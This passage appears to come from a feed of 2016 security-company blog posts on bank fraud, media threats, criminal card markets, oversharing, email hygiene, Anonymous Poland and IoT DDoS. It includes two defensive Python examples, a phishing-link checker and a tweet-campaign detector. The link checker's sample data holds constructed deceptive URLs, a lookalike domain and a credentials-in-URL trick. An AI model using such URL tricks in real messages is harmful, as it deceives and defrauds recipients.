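With these constructed inputs H1 and H3 accumulate no inconsistency and tie, while H2 and H4 each pick up the three items rated against them, which is the shape of the assessment below. The last item is flagged as non-diagnostic: the test-then-large-transaction pattern fits every cash-out scenario and so tells the analyst nothing about which one occurred.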

Although it was not possible to definitively rule out any of the four hypotheses examined, we assess that the available information indicates that H2 (banking trojan) and H4 (cash-out using aggregated card information) are less consistent with that information than H1 (payment system compromise) and H3 (cash-out of cloned cards). A number of data points were assessed to be inconsistent with H2 and H4, most notably the NCSC statement that the Tesco Bank incident did not represent a threat to the wider UK banking sector, the short timeframe of the attack and the reported focus on current accounts as opposed to credit accounts.

At the time of writing none of the available data points were assessed to be significantly inconsistent with either H1 (payment system compromise) or H3 (cash-out of cloned cards), so it was not possible to determine which of these hypotheses was more likely to be accurate. However, it was assessed that H3 (cash-out of cloned cards) would likely have been simpler to execute than H1 (payment system compromise) and, in operational terms, would have involved fewer moving parts. While this cannot be counted as a concrete data point, it was assessed to potentially indicate that H3 (cash-out of cloned cards) may be the more plausible scenario. Although reporting from Tesco Bank has indicated that money was successfully stolen from only 9,000 accounts, the actors responsible reportedly targeted 40,000 within a 48-hour period. This would likely have required substantial resources and a well-organized logistics network to support the process of cashing out the targeted accounts and laundering the money obtained within such a short timeframe. Irrespective of the method employed, it was therefore assessed to be highly likely that these thefts were conducted by an organized criminal group.

Statements made by Tesco have indicated that the company is collaborating with the NCSC and the UK National Crime Agency (NCA) in investigating this incident. All three organizations have declined to provide substantive details regarding the incident, citing the need to preserve the integrity of the investigation. However, it was assessed to be likely that further information will be made available as the investigation continues.

    It is a realistic possibility that the actors responsible for these thefts will attempt to further monetize any Tesco Bank account information in their possession by attempting to sell it within the criminal ecosystem.

    In the immediate future, it’s likely Tesco Bank customers will be targeted with phishing emails imitating law enforcement or Tesco Bank customer support. Tesco Bank customers are advised to exercise caution when receiving calls or opening emails or SMS messages purporting to relate to this incident and to report any suspected phishing attempts to Tesco Bank via

Top 5 Threats to the Media and Broadcasting Industry Fri, 11 Nov 2016 11:20:26 +0000 For media and broadcasting organizations, the threat of having their websites forced offline is a significant one. We looked beyond DDoS to understand the threats to broadcasting and media organizations in 2016 and outline steps they can take to prevent and mitigate potential threats.

    While IoT botnets can act as a force multiplier for otherwise ineffective hacktivist campaigns (such as OpSilence and OpClosedMedia), DDoS attacks are only one piece of a far larger threat landscape for media organizations. Security professionals must understand the other threats that pose risks to their industry, including extortion, propaganda, malvertising and leaked data. By understanding the actors targeting your organization – as well as the tools they are using – organizations can take a more proactive approach to security.


    Figure 1: Top 5 Threats to the Media and Broadcasting Industry

Aside from DDoS, one threat media organizations should consider is malvertising: the use of online advertising to spread malware, typically as a vector to compromise users who are visiting legitimate websites. It is most effective against users running out-of-date browsers and plugins, which a malicious advertisement can exploit as soon as the page loads, without the user clicking anything. Because advertising content is inserted into high-profile, reputable websites through ad networks, malvertising gives online criminals a way to reach users who would never visit an attacker-controlled site and whose defences are tuned to block obviously malicious domains. News sites are among the most popular targets. One example of an actor targeting media organizations is AdGholas, a malvertising campaign that exploited an Internet Explorer vulnerability.

Other substantial threats to the media and broadcasting industry include data breaches and account takeover. Over the last four years there have been numerous cases of media and broadcasting organizations suffering breaches, and these are outlined below. In addition to these, there are third-party breaches that impact your organization. Among the world's biggest 1,000 companies, those in the entertainment industry saw the exposure of nearly 1 million email and password combinations. These can be used in account takeovers, spam campaigns and credential stuffing.

Figure 2: Media data breach victims

Organizations should look beyond the risks associated with availability of services and also consider the threat posed by extortion, propaganda, malvertising and leaked data. By understanding these, media and broadcasting companies will be better placed to secure themselves and their customers.


Surveying the Criminal Market Tue, 08 Nov 2016 09:04:19 +0000 It's no secret that your personal information and data is valuable to cybercriminals, but is there more of a market for certain types of data than others? During our research into criminal forums and marketplaces, it's never surprising to see personal data on sale, be it payment card details, social security numbers, compromised accounts or databases. So how common is the trade in these types of data, and how do they compare to each other in terms of how frequently they are advertised? To establish some indication of this, we ran searches for keywords and phrases on over 300 criminal locations. The results are shown in Figure 1.

Figure 1: Items for sale on criminal marketplaces, by number of mentions

The graph shows that the discussion of payment card details is considerably more frequent than that of the other data types. This is not to say that the number of mentions in the graph translates directly into the number of payment card details being sold, but I would argue that it highlights how frequently this data is traded, sold and posted to criminal forums and marketplaces. There are a number of possible explanations for this, but I would say that credit card details can be easily monetized by cybercriminals, which in turn increases the demand for this type of information. This is evident from the large number of clear and dark web sites dedicated to the sale of payment card details, called automated vending carts (AVCs), examples of which include Rescator and Bestvalid. Quite simply, there is readily accessible money behind compromised payment card details, while monetizing a social security number, an account or a database can take a lot more time and effort.

    Further contributing to the overwhelming disparity between discussions of payment card details and the other highlighted commodities could be the relatively large number of methods by which they can be compromised. For instance, it’s possible for attackers to use physical skimming devices, point of sale malware, keyloggers, phishing pages and other forms of social engineering and even data breaches to steal or acquire compromised payment card information. These factors are all likely to contribute to the number of payment card details available on criminal forums and marketplaces.

While our findings relating to keywords cannot be used to quantify the number of payment card details, or indeed other commodities, being sold on criminal locations, they do provide insight into how popular each type of data is. Research such as this helps us to understand the state of the cybercriminal marketplace, including what cybercriminals can most easily obtain and what is likely to be perceived as the most profitable commodity. Developing this understanding in turn gives us a stronger appreciation of the cybercrime ecosystem and of a threat actor's environment.

    Overexposed and Under-Prepared; The Risks of Oversharing Online Tue, 08 Nov 2016 08:56:01 +0000 I have a confession to make.

    I know where you live.

    I also know who you’re married to and the names of your children. I even know the name of your dog (who, by the way, looks really cute in your profile picture). I was sorry to see that your planning application got turned down, the ground floor extension looked like it would have been a lovely addition to your home in those plans I found. While I have your attention, let me ask how you’ve been getting on with your yoga class? The class you go to at the sports centre looks fun and I’m thinking of joining. It’s quite conveniently located, right next to your kid’s school. Listen, if you fancy a chat one day I can give you a call. I found your phone number in the WHOIS information for your website. Or if you’re busy I can email you? Would you prefer I use your work or personal email? Or I can pop by for a visit? After all, I know where you live.

    These are just some examples of the type of information available online for public consumption. And none of it was obtained from a data breach or other such intrusive attack. The information was willingly, voluntarily, and openly posted online on a variety of websites and searchable databases. It is often put there by you.

Normally when we consider the exposure of sensitive information we think of financial records or card payment data. This is certainly of concern, but also of interest is personally identifiable information (PII), sensitive data such as information about family and friends, and what is considered "soft data", including details such as hobbies and interests. The information usually accumulates over time, steadily building up a picture of the individual. You may think the exposure of this type of information is inconsequential, unavoidable, or even inevitable. But it can provide a wealth of opportunities to a threat actor.


    One such opportunity is spear phishing. It is an effective, and thus popular, tactic because the attackers use information relevant to the target to encourage them to open and interact with the malicious email. The more information there is available, the more the attacker has to work with. The email may address you by your full name and discuss a subject of interest to you, such as a holiday destination or a hobby. And although knowing your name and that you’re a tennis fan may not seem particularly dangerous, the repercussions of a CEO or finance officer or system administrator opening said email can be severe. Spear phishing has been associated with numerous cyber attacks in recent history, including attacks against retailers, healthcare, and government departments.

Digital Shadows SearchLight™ monitors for an organization's leaked assets online, including information pertaining to their VIPs. We can conduct focused research on an individual, looking at information that is both intentionally and unintentionally exposed. To achieve this we take an "attacker's eye view" of the information publicly available, and then identify and assess the potential threats that information could pose to you and your company. This includes identifying the pivot points which connect at least two pieces of information together and attribute the information to the individual. The types of threats we seek to identify can include reputational damage, identity theft, impersonation, or even an attack (of either the cyber or physical variety).

    We’re not suggesting you lock yourself away, close all your accounts, and never go online again. But rather to be aware of what you share, because it may just be the opportunity a threat actor is looking for.

    Five Tips For Better Email Security Tue, 08 Nov 2016 08:49:50 +0000 While security is everyone’s responsibility, it’s not always easy to get right. Our “Security Best Practices” blog series will provide simple tips that enable users to improve their online security. These articles aren’t for pros, but for those trying to get their basics down.

    Even the most sophisticated cyber attacks can begin with a relatively simple email compromise. Only last week, we learned that attackers had crafted fake email invitations to deliver information stealing malware to guests attending a Palo Alto security conference in Indonesia. The attackers cleverly used screenshots of genuine conference invitations sent by Palo Alto to deceive the unsuspecting attendees.

    With this in mind, here are some of our simple tips to help make your email more secure, without the need to set up a private email server.

    1. Check your email sources

    Always check who the email came from. Attackers use many techniques to try and appear legitimate, such as using domain names which look almost identical to a genuine domain in order to trick you into visiting that site. This is known as typo-squatting – for example, www.go0gle[.]com might be used to direct users to malware. If it’s an address you’ve never seen before, try searching online for the email domain to see if it’s from a registered company.

    2. Don’t click on links

    Don’t directly click on links in an email. Instead, hover over the hyperlink and make sure the URL matches the page you actually want to visit. Attackers are becoming savvier, and they often hide fake URLs behind linked image buttons or text links, such as “click here”.
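Tips 1 and 2 can be automated for a mail gateway or a browser plugin. The example below is added here and is not code from the original post: check_links() does what "hover over the link" does by hand, comparing each link's visible text with its real destination, and lookalike_of() flags lookalike domains such as go0gle.com against a list of domains you trust. The sample email body, the trusted-domain list and the homoglyph table are constructed for the example.

```python
"""Added example (not code from the original post): automated versions of tips
1 and 2. check_links() does what "hover over the link" does by hand, comparing
each link's visible text with its real destination, and lookalike_of() flags
lookalike domains such as go0gle.com against domains you trust. The sample
email body and trusted-domain list are constructed for this example."""
from difflib import SequenceMatcher
from html.parser import HTMLParser
from urllib.parse import urlparse

# Digits and letters attackers swap because they look alike in many fonts.
HOMOGLYPHS = str.maketrans({"0": "o", "1": "l", "3": "e", "5": "s", "7": "t"})

TRUSTED = ["google.com", "paypal.com", "tesco.com"]  # constructed allow-list

def registrable(host):
    """Crude registrable domain: last two labels. Good enough for .com; a real
    implementation would consult the public suffix list (co.uk etc.)."""
    labels = host.lower().rstrip(".").split(".")
    return ".".join(labels[-2:])

def lookalike_of(host, trusted, threshold=0.85):
    """Return the trusted domain `host` imitates, or None if it is either a
    genuine trusted domain or nothing like one."""
    domain = registrable(host)
    trusted = [t.lower() for t in trusted]
    if domain in trusted:
        return None
    # Fold confusable characters, then allow a little edit distance for
    # doubled or dropped letters (gooogle.com).
    folded = domain.translate(HOMOGLYPHS).replace("rn", "m").replace("vv", "w")
    for t in trusted:
        if folded == t or SequenceMatcher(None, folded, t).ratio() >= threshold:
            return t
    return None

class LinkExtractor(HTMLParser):
    """Collect (href, visible text) for every <a> in an HTML body."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href", ""), []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def host_of(text):
    """Host named by a link's visible text, if that text is a URL or domain."""
    text = text.strip()
    if not text or " " in text:
        return None
    host = urlparse(text if "://" in text else "http://" + text).hostname
    return host if host and "." in host else None

def check_links(html, trusted):
    """Return (href, reason) findings for an HTML email body."""
    parser = LinkExtractor()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        parsed = urlparse(href)
        real_host = parsed.hostname or ""
        if not real_host:
            continue  # mailto:, relative links etc. are out of scope here
        if "@" in parsed.netloc:
            # http://paypal.com@evil.example/ goes to evil.example: the part
            # before '@' is treated as a username and ignored by the browser.
            findings.append((href, "userinfo trick: real host is " + real_host))
        if real_host.replace(".", "").isdigit():
            findings.append((href, "link goes to a bare IP address"))
        else:
            target = lookalike_of(real_host, trusted)
            if target:
                findings.append((href, f"{real_host} looks like {target}"))
        shown = host_of(text)
        if shown and registrable(shown) != registrable(real_host):
            findings.append((href, f"text says {shown} but link goes to {real_host}"))
    return findings

# Constructed sample email body.
SAMPLE_EMAIL = """<p>Your invoice is ready.</p>
<a href="http://www.go0gle.com/login">https://accounts.google.com/</a>
<a href="https://paypal.com@198.51.100.7/verify">click here</a>
<a href="https://mail.google.com/">mail.google.com</a>"""

if __name__ == "__main__":
    for href, reason in check_links(SAMPLE_EMAIL, TRUSTED):
        print(f"{href}: {reason}")
```

The first sample link is flagged twice (its destination is a lookalike of google.com, and its visible text names a different host), the second twice (the credentials-in-URL trick and a bare IP address), and the genuine mail.google.com link not at all. The registrable-domain helper is deliberately crude; anything running in production should use the public suffix list, otherwise every site under co.uk collapses into one "domain".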

    3. Don’t open unsolicited attachments

Files aren't always what they appear to be. Malware could be masquerading as a seemingly benign text or image file. These emails aren't always easy to spot, and they won't all be from a Nigerian prince claiming to hold the key to your long-lost second cousin, twice removed's "peanut dust" fortune. Some will claim to represent a legitimate company, such as a supplier, and attach documents purporting to be invoices in the hope that you'll take the bait.


    Figure 2: Too good to be true? If in doubt, forward all such requests to Dragon’s Den

    When dealing with email attachments, be extra careful if asked to enable macros. Macros are bits of code embedded within documents. Though not always bad, they have historically been used to deliver malware. To help combat this, you should avoid enabling macros in email attachments, and ensure any built-in macro security features are always turned on.

    4. Use separate accounts and enable two-factor authentication

We know it's tempting to simply use one email account across all the online services you are active on, but in doing so you're playing straight into the hands of an attacker. If someone manages to break into that account, they can use password resets to take over every other service registered to that address (and if you reuse the same password, they won't even need to). Consider having separate accounts for different activities, such as one for work email, one for personal use, and another for sites which bombard you with marketing material.

To top it all off, make sure you enable two-factor authentication to make it harder for anyone trying to compromise these accounts.

    5. Limit how widely you share your email address

    Always think twice about what information you’re posting online. An exposed email on Facebook or a particular forum might be all the invitation someone needs to target you with phishing emails. As well as this, when you sign up for a service or post your email to a public site, your address can be copied or shared to be used by spammers.

    So if you have to share your email address publicly, try and avoid using emails which link to important services – such as Facebook or your online banking.

    Resilience: Adapt or Fail Fri, 28 Oct 2016 16:23:33 +0000 “But it ain’t how hard you hit; it’s about how hard you can get hit, and keep moving forward.”- Words made famous by a portrayal of resilience himself, Rocky Balboa.

    Without resilience, the internet probably wouldn’t have been created – if someone gave up every time their project went awry, the Internet of Things would be as foreign to us as teleportation. Luckily though, the trailblazers kept going and we are more connected electronically than ever before.

Imagine, then, that one day a massive failure in U.S. infrastructure caused a national power outage, or that more digital weapons in the mould of Stuxnet were released. Would you be able to get your work done? Would you even be able to cook, or pick up your kids from school? How easily would we bounce back from that, and how easily would our systems?

    Resilience is commonly defined as the ability of something or someone to spring back into shape and quickly recover from difficulties. I also like to think of it as how well we continue on, as resilience can be chipped away with time.

    The good news is, being resilient with systems and security is within our control. In fact, human behavior alone is both the core issue and solution surrounding cyber resilience of organizations.

A study I conducted previously looked at the effect the division of labour had on a company's overall security. I found that physically dividing co-workers by department and team had a negative impact on overall resilience, because information was siloed. Straightforward enough, right? The surprising part was that even within teams the understanding of security was skewed. There was no standard or baseline level of knowledge required of anyone, and in fact the employees themselves posed a bigger threat to the company than any outsider.

    As the definition above states, being resilient means being able to snap back into action. The company studied wouldn’t have had enough knowledge between teams to have a unified crisis plan, to be able to regain stability after an unsavoury event.

    Organizational Resilience

    Contrasting this, an example of a highly resilient company, comes from a study a former professor of mine published. He had been observing stock traders in NYC for quite some time when 9/11 happened. After their office in NYC was shut down from the attacks, the trading company moved to a separate office in New Jersey, which hadn’t been utilized previously. The study found that after 9/11, when the employees were forced out of their office and halted their capabilities, they set up the office in NJ as similar as they could to their old one, and all had the mentality of gaining normality again after such horrendous events had happened. With their collective approach to just keep going, they restored their business function six months after the attack and didn’t lose a single employee in the process.

Now, something important to point out is that in the stock trading world you are used to chaos. There is always a level of uncertainty and stress surrounding you. In regards to resilience, however, this is actually incredibly positive. The study found that having had a reasonable level of chaos on a daily basis actually helped the traders bounce back, and made them all the more resilient.

    So how do we make sense of this? How do we get from the first company mentioned, who had very little to no resilient practices in place, to the second company who was able to overcome a tragic event?

A resilient system is created when an entire team shares the same baseline knowledge and is able to act and react, proactively and retroactively, to security threats. If a system goes down and no one knows how to fix it, or if different people each hold a piece of the information that could fix it but never put the pieces together, then there really is no hope.

    But what’s even more important, and sometimes overlooked, is having a diverse workforce. While working security knowledge and core values should be shared amongst teams, having different thought processes and backgrounds keeps ideas from going stagnant and lowers the possibility of group think.

Think about antibiotic-resistant bacteria and how these organisms have reshaped and changed in response to new threats, such as antibiotics, over the decades since those drugs were introduced. The most resilient are the ones that were able to evolve with an ever-changing environment rather than remain the same.

    When it comes to organizational resilience, we’re only as strong as our weakest link, therefore it’s up to companies to create a stronger security culture and general awareness of each other in order to become more resilient.

    Here are a few ideas on how you can build organizational resilience:

    • Treat everyone equally – have a base level of security knowledge everyone needs to know
    • Have drills – be able to respond under attack (phishing campaigns for one)
    • Have a diverse team and continuously challenge the process. Embrace new ways of looking at issues/topics. This starts in your recruitment, and is driven by your leadership teams.
    • Have backups – every organization should have a business continuity plan intact, but take this a step further, consider different locations you could work out of, how you could rebuild and what you would need/how you would communicate to your staff.
    • Accept that there are things that are so unknown, that you can’t prepare for them, and allow for mistakes to happen. Have transparency so that people aren’t afraid to discuss mistakes.
• Always get back up. Keep trying. Challenge the process. When you have a resilient culture, everyone helps out and collaboration skyrockets.
Anonymous Poland – Not Your Typical Hacktivist Group Fri, 28 Oct 2016 09:09:50 +0000 On October 29, 2016 a Twitter account associated with Anonymous Poland began to post tweets claiming to have compromised the network of the Bradley Foundation, a U.S.-based charitable organization. The breach was confirmed by the Bradley Foundation on November 4, 2016. The tweets claimed that more than 100,000 files had been obtained, purportedly the organization's entire file backup. Anonymous Poland posted a .rar archive consisting of 70,904 files totalling 42.8GB when uncompressed. The majority of the files were email archives and MS Office documents relating to the Bradley Foundation's business operations. Our examination of a selection of the documents indicated that some were created or edited by users whose names were consistent with the Bradley Foundation's current and former employees. Several of these documents contained personally identifiable information (PII) relating to the organization's employees and donors, including donor and employee contact information and employee W-2 forms.

    What was most notable was the way that the threat actors attempted to get the word out. Between October 29 and 31, Digital Shadows detected more than 8,000 nearly identical tweets posted by 7,500 separate Twitter accounts. All of these tweets tagged another account, featured links to the Anonymous Poland twitter account, and had minor variations on the text shown in Figure 1.


    Figure 1 – Example of one of over 5,000 nearly identical tweets

    Digital Shadows continued to detect low volumes of very similar tweets on November 1 and November 2, which featured links to emerging news coverage of this claimed breach. On November 3, 2016, Digital Shadows detected a substantial uptick in volume and identified 2,544 new tweets from 2,544 unique handles, all of which very closely resembled the message shown in Figure 2.


    Figure 2 – Example of tweets mentioning attack against Bradley Foundation site

    Following this, on November 7 and 8, Digital Shadows detected a further dramatic uptick in volume of tweets, all of which closely resembled that shown in the image below. The graph below shows the days on which high volumes of tweets were detected and the number of associated unique handles. While many of the handles used in this campaign were registered years ago and featured content unrelated to this activity, some were newly registered and did not feature any other content.


    Figure 3. Number of near identical tweets publicizing the Bradley Foundation breach detected by SearchLight between October 29 and November 8, 2016.
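The detection behind the graph above, as an added example (this is not SearchLight's logic): it groups tweets that are near-duplicates once the parts a campaign varies (the tagged account, the URL, hashtags, case and punctuation) are stripped, then reports per day how many copies and how many distinct handles each template had. The tweets are constructed to imitate the pattern described in the post and are not the real Bradley Foundation tweets.

```python
"""Added example, not Digital Shadows' SearchLight logic: groups tweets that
are near-duplicates once the parts a campaign varies (tagged account, URL,
hashtags, case, punctuation) are stripped, then reports per day how many
copies and how many distinct handles each template had. The tweets are
constructed; they imitate the pattern described in the post and are not the
real Bradley Foundation tweets."""
import re
from collections import defaultdict
from difflib import SequenceMatcher

# (date, handle, text): constructed sample with five campaign copies across
# two days, one account spamming itself, and two unrelated tweets.
SAMPLE_TWEETS = [
    ("2016-10-29", "acct_a", "@newsdesk1 Anonymous Poland hacked the Bradley Foundation! 100k files leaked https://t.co/aaa1 #AnonPoland"),
    ("2016-10-29", "acct_b", "@reporter_b Anonymous Poland hacked the Bradley Foundation!! 100k files leaked https://t.co/bbb2"),
    ("2016-10-29", "acct_c", "@tvstation Anonymous Poland hacked Bradley Foundation! 100k files leaked https://t.co/ccc3 #AnonPoland"),
    ("2016-10-30", "acct_d", "@paper_d ANONYMOUS POLAND hacked the Bradley Foundation - 100k files leaked! https://t.co/ddd4"),
    ("2016-10-30", "acct_e", "@site_e Anonymous Poland hacked the Bradley Foundation! 100k files leaked. https://t.co/eee5 #leak"),
    ("2016-10-29", "spambot", "Buy followers now https://t.co/spam1"),
    ("2016-10-30", "spambot", "Buy followers now https://t.co/spam2"),
    ("2016-10-31", "spambot", "Buy followers now https://t.co/spam3"),
    ("2016-10-30", "acct_f", "Lovely weather in Krakow today"),
    ("2016-10-31", "acct_g", "Bradley Foundation responds to breach reports https://t.co/news1"),
]

_VARIABLE = re.compile(r"https?://\S+|@\w+|#\w+")  # parts the operator rotates
_PUNCT = re.compile(r"[^\w\s]")

def normalize(text):
    """Reduce a tweet to the words a campaign operator keeps fixed."""
    text = _VARIABLE.sub(" ", text.lower())
    return " ".join(_PUNCT.sub(" ", text).split())

def cluster(tweets, threshold=0.9):
    """Greedy single pass: a tweet joins the first cluster whose template it
    matches at >= threshold similarity, otherwise it starts a new cluster."""
    clusters = []
    for date, handle, text in tweets:
        norm = normalize(text)
        for c in clusters:
            if SequenceMatcher(None, norm, c["template"]).ratio() >= threshold:
                c["posts"].append((date, handle))
                break
        else:
            clusters.append({"template": norm, "posts": [(date, handle)]})
    return clusters

def campaign_report(clusters, min_copies=3, min_handle_ratio=0.8):
    """Keep clusters that look like coordinated amplification: several copies
    and almost as many distinct handles as copies. One account repeating
    itself is ordinary spam; thousands of accounts posting once each is the
    pattern described in the post."""
    report = []
    for c in clusters:
        handles = {h for _, h in c["posts"]}
        copies = len(c["posts"])
        if copies >= min_copies and len(handles) / copies >= min_handle_ratio:
            per_day = defaultdict(set)
            for d, h in c["posts"]:
                per_day[d].add(h)
            report.append({
                "template": c["template"],
                "copies": copies,
                "unique_handles": len(handles),
                "handles_per_day": {d: len(hs) for d, hs in sorted(per_day.items())},
            })
    return report

if __name__ == "__main__":
    for entry in campaign_report(cluster(SAMPLE_TWEETS)):
        print(entry)
```

On the sample the five campaign tweets collapse into one template with five distinct handles (three on the 29th, two on the 30th), the self-repeating spam account is excluded by the handle ratio, and the unrelated tweets stay in their own clusters. The greedy pass is quadratic in the number of clusters, which is fine for a day's worth of matches on a single topic; at SearchLight scale you would replace SequenceMatcher with MinHash or a hash of the normalized text.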

The available information on this breach and the subsequent activity identified on social media indicate that this was almost certainly a relatively complex, multi-stage operation. While the exact tactics, techniques and procedures used to conduct the breach are unknown, it would likely have required initial reconnaissance, a breach of the organization's network and the exfiltration of the data. This element of the operation would also have had to be coordinated with efforts to register or compromise around 7,500 Twitter accounts for the next stage, in which the breach was disclosed and publicized via social media. This indicates that Anonymous Poland was highly likely a well-organized group with experience of planning and executing operations atypical of commonly identified hacktivist groups.

    Previous research has speculated that Anonymous Poland, despite its use of Anonymous collective imagery and language, may be a legend being used by a Russian state actor to deniably leak information in service of influence operations.

    Although we have identified no definitive indications of a link between Anonymous Poland and Russia, it was assessed that some of the available information could be consistent with this hypothesis. The group has demonstrated a greater level of sophistication and competence than typically observed from hacktivist actors. Additionally, an examination of Anonymous Poland’s activity history indicated that the Twitter account used to disclose the Bradley Foundation breach has never been used to publicly post content on issues specifically relating to Poland. It was, however, used to leak documents purportedly obtained in a breach of the Ukrainian Ministry of Internal Affairs and data purportedly obtained in a breach of the World Anti-Doping Agency in Aug 2016, post a defacement of the U.S. Olympic team website and multiple denial of service attack claims against the Paralympics website in September 2016. This activity could be interpreted as consistent with Russian interests. We assessed that, while it was possible that Anonymous Poland was a sophisticated independent hacktivist group, it was also possible that the group may be a deniable false persona being used as part of a wider set of influence operations. However, we detected no evidence to confirm the identity or location of the individuals operating the Anonymous Poland Twitter account.

    Don’t Break the Internet, Fix Your Smart Devices Tue, 25 Oct 2016 10:30:58 +0000 The Distributed Denial of Service (DDoS) attack, which targeted DynDNS servers, and literally ‘broke the internet’ for several hours on October 21st, pushed an issue that has been plaguing security professionals since the dawn of the Internet of Things (IoT) into mainstream media.

    Typically, DDoS attacks occur when infected personal computers or workstations form what is known as a botnet and overwhelm a server with an excess of traffic or requests. In this particular case, however, servers belonging to a popular Domain Name System (DNS) company were hit.

    For some background, DNS functions like the internet’s iPhone contacts list. It translates domain names (your friends’ names), which are easy for humans to remember, into server IP addresses (their phone numbers) and allows networking devices (your phones) to communicate in order to ensure you end up at the appropriate destination. However, when DNS goes down, traffic loses its ability to travel to sites using this particular service.

    The DynDNS attack was completely different, however. This time the botnet did not consist of just workstations, but IoT devices, as well; and it occurred on a colossal scale due to the sheer number of devices that make up the IoT. This means that our fancy smart thermostats, baby monitors, home automation systems, and light bulbs could have theoretically contributed to this attack.

    Securing Smart Devices

    Going forward, if we want to prevent something like this from happening in the future, we need to be collectively more diligent about hardening IoT devices. So how do we do that exactly?

    Your smart devices live on your home network. Therefore, their security is completely dependent upon your network configuration. Check your networking devices’ manufacturer guidelines regarding access to the admin panel. Typically this is reached by simply typing the router’s local IP address (or a similar address) into your browser. These panels offer an easy-to-understand Graphical User Interface (GUI) for users. In addition, default login credentials can easily be located online (herein lies a part of the problem…).

    Upon logging in, consider changing the device login credentials from the factory default. Ensure that your network is protected by Wi-Fi Protected Access II (WPA2) encryption and consider hiding your Service Set Identifier (SSID). This will prevent your network’s name from being visible to outsiders. Users will have to know it and manually type it and the password in to gain access.

    Device firmware can also be updated from these panels. Ensure that your device is running the latest version. Firmware updates are important because, unlike application software, firmware controls the essential functions of the device hardware. If there is an automatic update option, select this for peace of mind.

    In a similar fashion, IoT devices can also be updated from administrative panels. Check manufacturer guidelines for information on how to access these settings from your home network. Firmware and security updates should also be maintained on these devices.

    Many IoT devices also come with apps to control them. Maintain similar diligence with mobile security in order to prevent unwanted tampering. Create a strong master password for access to your device; ensure all devices and applications are fully patched and updated; turn off Bluetooth capabilities when not in use; never allow other applications to have full access to your mobile device; avoid rooting your mobile devices; ensure these devices are fully encrypted and avoid leaving them unattended.

    As the IoT grows, the threat of this type of attack will increase dramatically. Preventing the next IoT DDoS attack depends on all of us. So do your part to create a more robust home network and don’t be afraid to step up your security game!

    Rocking the Vote? The Effects of Cyber Activity On The U.S. Election Tue, 25 Oct 2016 09:22:27 +0000 Contrary to some media reporting, our latest research finds that cyber activity during the 2016 U.S. presidential election does not appear to have demonstrably altered events in the short-term.

    For this post, let’s leave aside hacktivism campaigns – such as OpTrump and OpKillary – that have been largely inconsequential (you can read the whitepaper for a detailed analysis). Instead, let’s look at the impact of the activities surrounding Guccifer 2.0, WikiLeaks and DC Leaks on public opinion.

    Of course, opinion polls are notoriously volatile, and any attempt to map out fluctuations in electoral support in line with cyber events using available polling data would need to be tentative. Moreover, opinion polls change on a day-to-day basis, and it would be very difficult to accurately quantify whether any increase or drop in support was a direct result of reporting on a cyber event, particularly as we do not know how widely or quickly such information would reach the voting public. Finally, there could be any one of a number of reasons for polling fluctuations; therefore, trying to tie individual cyber events to changes in polling numbers would be speculative at best.

    Despite this, if we look at Clinton and Trump’s polling statistics over a broader period, certain trends emerge which may, in part, have been influenced by cyber events. The graph below presents polling statistics for Clinton and Trump since July 2015 (the area in blue below the line represents the percentage lead of either candidate). This indicates that Clinton experienced her most sustained period of low polling between mid-May and early August 2016.

    Figure 1: Clinton vs Trump polling data from July 2015 to the time of writing (Source:

    Perhaps coincidentally, the reported compromise of the DNC’s network, the emergence of Guccifer 2.0, the leaking of over 19,000 DNC documents by WikiLeaks, and the reported compromise of the DCCC network all occurred between June 14 and July 29 – the period in which Clinton polled the lowest in her entire campaign. The graph below shows an enhanced snapshot of this period, between late May 2016 and the time of writing, along with some of the major events to have occurred during that time.

    Figure 2: Clinton vs Trump polling data from May 2016 to the time of writing (Source:

    Clinton’s polling figures actually increased following reports of the DNC network compromise and the series of Guccifer 2.0 leaks, although her support then dropped in late June and remained low until early August 2016. Trump’s polling figures increased following reports of the DNC compromise, and rose steadily as the Guccifer 2.0 and WikiLeaks data leaks came to light. However, following an initial peak after becoming the official nominee for the Republican Party, Trump’s polling figures dropped dramatically.

    The polling numbers are far from conclusive, and there could be any number of reasons why support for Clinton remained relatively low throughout July. One potential factor may have been the increased media reporting of the cyber activity involving Guccifer 2.0, DC Leaks, WikiLeaks and the attacks on the DNC. Media reporting about the information included in the data leaks increased, and the Democratic Party experienced added public scrutiny in the lead-up to and during their party convention. Perhaps significantly, Clinton’s support dropped noticeably in the immediate aftermath of the public resignation of DNC chairperson Debbie Wasserman Schultz on July 28. The resignation of Schultz was a direct result of the DNC breach data hosted by WikiLeaks. Likewise, increased scrutiny on Clinton and the Democratic Party may have had a knock-on effect on Trump’s polling figures, which appear to have steadily risen in line with the sustained spell of cyber activity. We can therefore make a tentative assessment that the combination of cyber events that occurred between mid-May and late July may have had a cumulative effect on the opinion polls, if only for a temporary period. These assumptions, however, cannot be confirmed.

    Regardless, it’s clear that any potential impact of this flurry of cyber activity was short-lived. Following her official nomination, Clinton’s polling numbers increased to pre-May levels – prior to the reported DNC compromise and the subsequent data leaks – and have remained relatively constant since then. Trump, on the other hand, experienced a major drop in support following his official nomination. There are, therefore, limits to any analysis that looks at how significant cyber activity has been in terms of voting patterns. In order to assess this further, respondents would need to be asked specific questions about why they favored a particular candidate over another at a specific time. Future analyses of the impact of cyber activity on elections would, therefore, benefit from having such polling data to draw on.

    While recent activity may not have rocked the vote towards a particular candidate, it’s also important to consider the public’s declining confidence in the electoral system. As voters’ faith in the electoral system diminishes, there is a chance that voter turnout could be suppressed – a sentiment that may well be exacerbated following Friday’s large-scale DDoS attack on Dyn.

    Targeting of Elections; Old News, Fresh Tactics Tue, 25 Oct 2016 09:18:41 +0000 There has been no shortage of media coverage surrounding the U.S. election and the associated nefarious cyber activity. Amid all this noise and rhetoric, our whitepaper summarizes what’s happened so far and the impact this has had on the election. But how unique is it for operations to be launched against elections?


    In April 2016, a South American hacker revealed his involvement in a covert campaign to swing the 2012 presidential election in Mexico. According to an interview, the hacker, Andrés Sepúlveda, was involved in rigging presidential elections in Nicaragua, Panama, Honduras, El Salvador, Colombia, Mexico, Costa Rica, Guatemala, and Venezuela. Following payment through middlemen, Sepúlveda and his team would manage thousands of fake profiles on social media in order to shape the discussion around political topics and even hack the cellphones and emails of candidates.

